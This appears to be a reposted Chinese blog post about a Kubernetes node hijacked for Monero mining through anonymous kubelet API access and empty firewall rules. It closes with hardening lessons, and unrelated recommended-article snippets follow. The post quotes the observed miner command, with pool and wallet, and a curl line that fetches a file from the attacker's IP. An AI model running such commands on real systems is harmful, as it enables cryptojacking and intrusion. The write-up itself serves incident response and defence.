记一次 Kubernetes 中严重的安全问题

最新推荐文章于 2024-10-31 15:59:53 发布
转载 最新推荐文章于 2024-10-31 15:59:53 发布 · 318 阅读 · 1
文章标签:

#java #kubernetes #分布式 #hadoop #编程语言


此事件发生在 2021-03 月份.

近期遇到了一次我们自建 Kubernetes 集群中某台机器被入侵挖矿, 后续也找到了原因, 所幸只是用来挖矿…

网络安全是个严肃的问题, 它总是在不经意间出现, 等你反应过来却已经迟了. 希望各位读者看完后也有所启发, 去检查及加固自己的集群.

入侵现象

检查到某台机器中出现了异常进程

./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm
curl -s http://45.9.148.35/scan_threads.dat

简单来讲, 就是我们的机器被用来挖矿了…

问题出现后, 我们第一时间关闭了 docker, 其实应该隔离下环境, 把挖矿程序 dump 下来, 以便后续分析.

具体原因排查

iptables 为空

出现了异常进程, 肯定是被入侵了, 我首先看的是iptables. 果不其然, 机器上的 iptables 规则是空的, 意味着这台机器在裸奔.

kubelet 裸奔

内部同事提出了有可能是 kubelet 被入侵的问题, 检查过其他组件后, 开始检查 kubelet 组件

最后检查到 kubelet 日志中有异常:

kubelet 设置不当

确认入侵问题, kubelet 参数设置错误, 允许直接访问 kubelet 的 api

发现是 kubelet 的启动项中, 该位置被注释掉:

然后文件中禁止匿名访问的配置没有读取

该项配置是由于我操作不当注释掉的

由于是新增加的机器, 当晚就发现了问题, 整个集群是我在管理的, 我跟随着一起排查, 所以很快就找到了原因, 当晚我就把其他机器中的配置项重新扫了一遍, 假如它们的防火墙失效了, 也会有类似的入侵情况发生, 还好此次事件控制在 1 台机器中.

改进方案

其实该问题理论上讲是可以避免的, 是因为出现了多层漏洞才会被有心人扫到, 我从外到内整理了一下可能改进的策略.

  1. 机器防火墙设置, 机器防火墙是整个系统最外层, 即使机器的防火墙同步失败, 也不能默认开放所有端口, 而是应该全部关闭, 等待管理员连接到 tty 终端上检查.

  2. 使用机器时, 假如机器不是暴露给外部使用的, 公网 IP 可有可无的时候, 尽量不要有公网 IP, 我们的机器才上线 1 天就被扫描到了漏洞, 可想而知, 公网上是多么的危险

  3. 使用 kubelet 以及其他系统服务时, 端口监听方面是不是该有所考量? 能不能不监听0.0.0.0, 而是只监听本机的内网 IP.

  4. 使用 kubelet 以及其他程序, 设计或是搭建系统时, 对于匿名访问时的权限控制, 我们需要考虑到假如端口匿名会出现什么问题, 是否应该允许匿名访问, 如果不允许匿名访问, 那么怎么做一套鉴权系统?

  5. 系统管理员操作时, 是否有一个比较规范化的流程, 是不是该只使用脚本操作线上环境? 手动操作线上环境带来的问题并不好排查和定位.

我这里不是抛出疑问, 只是想告诉大家, 考虑系统设计时, 有必要考虑下安全性.

总结

发生了入侵事件后, 同事开玩笑说, 还好没其他经济损失, 要不我可能要回家了. 作为集群的管理员, 只有自己最清楚问题的严重程度. 从本质上来讲, 问题已经相当严重了. 入侵者相当于拥有了机器上 docker 的完整控制权限. 如果读者有读过我关于docker 系列[1]的内容, 就对权限上了解清楚了.

因为此次事件的发生, 不只是我, 还有 SA 的同学基本都被 diao 了一遍, 心里还是有点难受的, 希望大家能对网络安全问题有所重视, 从加固防火墙开始, 避免监听不必要的端口, 这两项至少是最容易实现的.

参考资料

[1]

docker 系列: https://corvo.myseu.cn/tags/Docker/

原文链接:https://corvo.myseu.cn/2021/03/23/2021-03-23-%E8%AE%B0%E4%B8%80%E6%AC%A1Kubernetes%E4%B8%AD%E4%B8%A5%E9%87%8D%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/


你可能还喜欢

点击下方图片即可阅读

记一次 Kubernetes 机器内核问题排查

云原生是一种信仰 ????

关注公众号

后台回复◉k8s◉获取史上最方便快捷的 Kubernetes 高可用部署工具,只需一条命令,连 ssh 都不需要!

点击 "阅读原文" 获取更好的阅读体验!

发现朋友圈变“安静”了吗?

4、Kubernetes集群安全强化指南
happy2的博客
07-04 105
本博客详细介绍了如何强化Kubernetes集群的安全性,涵盖了从保护数据存储(如etcd)、API服务器安全配置、静态加密Kubernetes机密,到身份验证与基于角色的访问控制(RBAC)等多个关键方面。同时,还讨论了限制云元数据API访问、启用审计日志、禁用Alpha/Beta功能、定期升级Kubernetes版本等实践建议。此外,推荐使用托管Kubernetes服务和参考CIS基准以简化安全管理。文章最后提供了安全措施的优先级划分及持续监控与改进策略,旨在帮助企业构建更加安全可靠的Kubernete
Kubernetes系统与CKA(D)考试经验】
我是Java程序员廖志伟,感谢朋友们的支持!不定期贡献一篇高品质、过万文字、图文并茂且附有视频解说、满载代码示例注释的良心之作,坚决杜绝粗制乱造。
05-06 1531
哈喽,大家好,我是廖志伟,一个专注高并发、高可用、高可靠、微服务、分布式、海量数据、性能调优、项目管理的开发者,希望本篇文章能给你带来收获,喜欢的可以关注我哟。
数千个不安全Kubernetes 集群暴露在互联网上
u012516914的专栏
05-05 315
最近在研究确定互联网上暴露的 Kubernetes 集群的安全态势,在研究过程中发现了超过 500,000 个不安全Kubernetes 实例。介绍近些年,容器和微服务已成为应用程序开发趋势。管理此类基础设施是生产环境中的一项巨大挑战。Kubernetes(或 k8s)除了是一个描述“指挥官”的希腊词外,还是一个非常流行的容器编排平台。模块化设计使其具有出色的灵活性和可扩展性,几乎所有组件都可...
云原生Kuberneteskubernetes 核心技术 - 集群安全机制
热门推荐
商务合作 | 共同学习 | 携手共进
09-03 5万+
Kubernetes 核心技术之集群安全机制(RBAC)详细介绍。
云原生Kubernetes环境的安全清单
k8scaptain的博客
06-15 414
Kubernetes正在更快地被采用,它的一个重要方面是安全性——这让早期的采用者束手无策。与VM相比,许多人怀疑容器和Kubernetes安全性,并因此放弃。但慢慢地,人们开始相信容器和Kubernetes和物理机和虚拟机一样安全安全是一个多层面的问题,必须从许多不同的角度加以解决。下面的清单涵盖了应该在整个堆栈中审查的主要安全领域。 安全必须是任何组织的DevOps过程的“一等公民”,通常被称为DecSecOps。在DevSecO...
KubeOperator K8S
新技术革命
04-16 383
https://docs.kubeoperator.io/KubeOperator-v2.5/introduction/
KubeOperator
爱是与世界平行
12-03 1114
KubeOperatorKubeOperator介绍技术优势KubeOperator的定位是什么?开源版和企业版的区别?KubeOperator 与 Kubespray 等部署工具的区别是什么?KubeOperator 和 Rancher 有什么区别?Kubernetes 集群中的 master 节点的推荐配置?KubeOperator总体架构模块说明 KubeOperator介绍 ​ KubeOperator 是一个 开源 的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的
深度解密|基于 eBPF 的 Kubernetes 问题排查全景图发布
阿里云云栖号
04-20 1563
简介:通过 eBPF 无侵入地采集多语言、多网络协议的黄金指标/网络指标/Trace,通过关联 Kubernetes 对象、应用、云服务等各种上下文,同时在需要进一步下钻的时候提供专业化的监测工具(如火焰图),实现了 Kubernetes 环境下的一站式可观测性平台。 作者 | 李煌东 当 Kubernetes 成为云原生事实标准,可观测性挑战随之而来 当前,云原生技术以容器技术为基础,通过标准可扩展的调度、网络、存储、容器运行时接口来提供基础设施。同时,通过标准可扩展的声明式资源和控制器来提供运维能
Kubernetes应用程序设计指南
漫漫人生路
07-18 602
设计和运行考虑到可伸缩性、可移植性和健壮性的应用程序可能具有挑战性,尤其是在系统复杂性增加的情况下。应用程序或系统的体系结构规定了它必须如何运行、它希望从其环境中得到什么,以及它与相关组件的耦合程度。在设计阶段遵循特定的模式并遵循特定的操作实践可以帮助应对应用程序在高度分布式环境中运行时面临的一些最常见的问题。Docker和Kubernetes等技术帮助团队打包软件,然后在分布式计算机平台上分发、部署和扩展。了解如何最好地利用这些工具的功能可以帮助你以更高的灵活性、控制力和响应性来管理应用程序。......
Kubernetes中的数据备份和恢复
Kubernetes作为一个容器编排平台,托管着各种微服务和持久化数据。在生产环境中,这些数据往往包含着业务的核心信息,如用户配置、持久化存储数据等。因此,一旦数据发生意外丢失或损坏,将会对业务造成严重影响甚至...
2022 年 Kubernetes 高危漏洞盘点
u012516914的专栏
12-17 1069
2022 年,Kubernetes继续巩固自己作为关键基础设施领域的地位。从小型到大型组织,它已成为广受欢迎的选择。出于显而易见的原因,这种转变使 Kubernetes 更容易受到攻击。但这还没有结束,开发人员通常将Kubernetes 部署与其他云原生组件一起使用来构建一个完善的工作系统。不幸的是,这种组合会导致具有更多组件的更复杂的基础架构。这最终会增加易受攻击的表面积和范围。根据 Red H...
当前Kubernetes攻击频发,怎样才能避免K8S集群“裸奔”
baidu_38876334的博客
04-01 497
例如,我们可以使用Prometheus、Grafana等工具来监控Kubernetes集群的健康状况,并使用ELK、EFK等工具来收集和分析日志,以及应对安全事件。这种情况下,攻击者可以利用未经授权的访问权限获取敏感信息或执行命令,例如上文提到的"Kubernetes未经授权访问漏洞"。通过以上表格,我们可以更加清晰地了解Kubernetes架构模型中各组件的作用和功能,有助于更好地理解Kubernetes集群的工作原理,从而更好地保护和维护Kubernetes集群的安全和稳定性。
如何在无需停机状态下解决 Kubernetes 集群中大规模 Log4Shell 漏洞
easylife206的专栏
12-18 297
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !新的严重漏洞Log4Shell是Apache Log4j库中的一个远程代码执行漏洞,这是一个非常流行的基...
K8s安全运维概述
小楼一夜听春雨,深巷明朝卖杏花
06-21 411
安全运维的重要性 • SecDevOps • K8s提供的安全机制 • K8s安全运维实践思路
Kubernetes(K8s)相关漏洞介绍
weixin_45945976的博客
10-31 1119
Kubernetes Image Builder通过Proxmox Provider构建的VM镜像中存在默认凭证漏洞(SSH账户builder/builder),由于这些默认凭证未在镜像构建完成后被修改或禁用,导致未授权攻击者可以利用它们通过SSH连接到使用受影响镜像的虚拟机,从而获得对目标节点的访问权限。这些只是一部分已知的Kubernetes安全漏洞,实际的安全风险可能更多,因此,定期更新和打补丁、遵循最佳实践进行安全管理是非常重要的。:集群内部的服务间通信如果没有充分加密,可能导致数据泄露。
CON318 | Kubernetes 安全:如何解决 Kubernets 的主要漏洞
just2gooo的博客
11-24 103
在这次具有洞察力的演讲中,Mica Hausler为保护Kubernetes集群提供了关键指导。他首先通过讲述一个令人毛骨悚然的事件开始,该事件涉及到一名匿名用户获得了对公司Kubernetes秘密的完全访问权限。随后,Hausler审查了常见的威胁,包括保密性、完整性和可用性泄露。他建议限制对Kubernetes API和数据平面的网络访问。接下来,Hausler探讨了攻击矢量和缓解措施。他详细说明了破损的访问控制、安全配置错误、过时的组件、不足的日志录/监控以及服务器端请求伪造的风险。
7 步保障 Kubernetes 集群安全
分享 GPU 管理与大模型推理相关技术实践
10-24 698
依赖 K8s 作为后端的 DevOps 团队必须意识到集群和可以在其中运行的 Docker 容器可能面临的所有风险和攻击。由于可用的攻击向量种类繁多、技术的不断进步以及该工具的一致、广泛采用,恶意攻击者发现渗透集群能够有效发起攻击并获得利益。保护 K8s 集群是一项艰巨的任务,密切关注并尽可能检测系统漏洞或恶意攻击行为至关重要。
手把手kubernetes本地化部署(含疑难杂症排查解析)
04-14 2170
Kuberntes已经成为云原生时代的“操作系统”,可谓是必学的内容。本文总结了使用Minikube本地化部署一个kuberntes的全过程,重点解析部署过程中的疑难问题和解决方案。 一步步跟着来,你也能轻松部署一个kubernetes
《应急响应》一次“XMR门罗币挖矿木马病毒”处置
1
11-03 3149
故事的起因于26号下午做渗透测试时,登录跳板机发现CPU进程拉满到200%,qiao哥看了一眼直接说是XMR挖矿,这句话勾引起我的兴趣,由于应急是我的薄弱项也没有时间深入学习,所以有本篇应急分析文章。
{"log_id":1894311124497964348,"error_msg":"image format error","error_code":216201}
最新发布
02-26
### 图像格式错误解决方案 当遇到图像格式错误 `errorCode:216201` 时,通常意味着在处理或加载特定图像文件时出现了问题。这类错误可能由多种原因引起,包括但不限于损坏的图像文件、不支持的编码格式或是库函数内部发生的内存分配失败等问题。 对于具体提到的忆体错误码 `H_ERR_JPGLIB_MEMORY 5575` 表明,在尝试解码JPEG图片的过程中遇到了严重的资源不足情况[^1]。这可能是由于应用程序试图一次性读取过大的图像数据到内存中所造成的。为了缓解这种情况,可以考虑优化程序逻辑来分批加载大尺寸图像的数据块,而不是全部一次性载入;另外也可以增加服务器端可用RAM大小或者调整操作系统的虚拟内存设置以提供更多的临时存储空间给libjpeg使用。 然而,当前提供的信息并不足以确切判断该错误是否直接关联于上述提及的Kubernetes Pod拉取镜像失败的情况[^2]。如果怀疑两者之间存在联系,则建议先排查容器环境配置以及确认宿主机上的磁盘I/O性能状态良好无异常后再做进一步诊断。 针对此类型的图像格式错误,以下是几种常见的解决方法: #### 方法一:验证并修复源图档 确保原始图像文件本身没有任何物理损伤,并且采用的是广泛兼容的标准压缩算法保存而成。可以通过其他第三方工具打开测试这些可疑文件来进行初步筛查。 #### 方法二:更新依赖项版本 保持使用的图形处理类库处于最新稳定版有助于获得更好的兼容性和安全性补丁。特别是涉及到跨平台移植的应用场景下更应该注意这一点。 #### 方法三:捕获详细的日志录 启用更加详尽的日志级别以便收集更多关于发生位置的具体线索。这对于后续定位根本原因是至关重要的一步。 ```bash # 设置更高的调试等级输出更多信息至控制台 export LOG_LEVEL=DEBUG ``` #### 方法四:实施合理的缓存策略 引入适当级别的对象缓冲机制可以在一定程度上减轻频繁访问外部资源所带来的压力,同时也减少了因网络波动而导致的操作超时风险。 ```python from functools import lru_cache @lru_cache(maxsize=None) def load_image(file_path): """通过LRU Cache装饰器实现简单的图片加载缓存""" with open(file_path, 'rb') as f: return f.read() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值